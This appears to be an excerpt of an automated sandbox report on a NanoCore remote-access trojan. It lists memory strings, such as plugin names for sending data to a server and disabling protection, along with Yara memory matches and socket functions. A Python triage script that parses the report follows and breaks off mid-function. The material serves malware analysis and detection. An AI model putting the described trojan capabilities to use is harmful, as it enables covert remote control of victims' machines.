Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: itugx.exe, 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: Yara match File source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00392163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_00392163
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00391B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 2_2_00391B61
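The memory-dump sources and the two socket API chains listed above are easier to triage in bulk than by eye: a full report carries hundreds of such lines. The script below is an added example written for this page, not part of the Joe Sandbox report or of its tooling. It parses a handful of lines copied from the report (embedded as constructed sample input), groups Yara memory hits per process index, decodes the page-protection field with the documented Windows PAGE_* values so executable regions (the dumps most likely to hold unpacked code) stand out, and flags code functions whose API chain creates, binds and listens on a socket. The eight-field layout of the .sdmp name, in particular that the fifth field is the page protection and that the code-function prefix carries a decimal process index, is an assumption of this example; fields not interpreted are kept raw.

```python
import re
from collections import defaultdict

# Constructed sample input: six "Source:" lines copied from the report above.
SAMPLE_LINES = r"""
Source: Yara match File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00392163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_00392163
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00391B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 2_2_00391B61
"""

# Documented Windows PAGE_* protection constants.
PAGE_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80

# Assumed layout of an .sdmp name (example's assumption, not documented here):
# <process index>.<dump stage>.<dump id>.<base address>.<protection>.<f6>.<f7>.<f8>
DUMP_RE = re.compile(
    r"File source: ([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})"
    r"\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp, type: MEMORY",
    re.I,
)
PROC_RE = re.compile(r"Process Memory Space: (\S+) PID: (\d+), type: MEMORYSTR")
# "<image> Code function: <idx>_<stage>_<addr> <call,call,...> <idx>_<stage>_<addr>"
FUNC_RE = re.compile(
    r"Source: (.+?) Code function: (\d+)_(\d+)_([0-9A-F]+) (\S+) \2_\3_\4\s*$", re.I
)


def parse_report(text):
    """Split report lines into memory dumps, string-hit processes and code functions."""
    dumps, procs, funcs = [], [], []
    for line in text.splitlines():
        line = line.strip()
        if m := DUMP_RE.search(line):
            prot = int(m.group(5), 16)
            dumps.append({
                "process_index": int(m.group(1), 16),
                "stage": int(m.group(2), 16),
                "dump_id": int(m.group(3)),
                "base": int(m.group(4), 16),
                "protection": prot,
                "protection_name": PAGE_NAMES.get(prot, hex(prot)),
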